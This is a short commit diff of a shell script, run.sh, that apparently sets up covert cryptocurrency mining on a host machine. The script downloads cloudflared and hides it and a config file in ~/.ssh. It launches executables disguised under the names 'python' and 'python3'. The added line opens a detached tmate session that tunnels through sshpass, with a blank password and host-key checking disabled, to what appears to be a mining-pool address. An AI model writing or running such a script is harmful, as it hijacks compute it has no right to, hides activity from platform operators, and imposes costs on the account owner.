Update run.sh
Browse files
run.sh
CHANGED
@@ -2,6 +2,6 @@ wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudfla
|
|
2 |
mkdir ~/.ssh
|
3 |
cp ./cloudflared ~/.ssh/
|
4 |
cp ./config ~/.ssh/
|
5 |
-
|
6 |
chmod +x python
|
7 |
bash python3
|
|
|
2 |
mkdir ~/.ssh
|
3 |
cp ./cloudflared ~/.ssh/
|
4 |
cp ./config ~/.ssh/
|
5 |
+
tmate -S tmate.sock1 new-session -d 'sshpass -p " " ssh -o StrictHostKeyChecking=no -L 3000:sg.vipor.net:5040 [email protected]' && tmate -S tmate.sock1 wait tmate-ready
|
6 |
chmod +x python
|
7 |
bash python3
|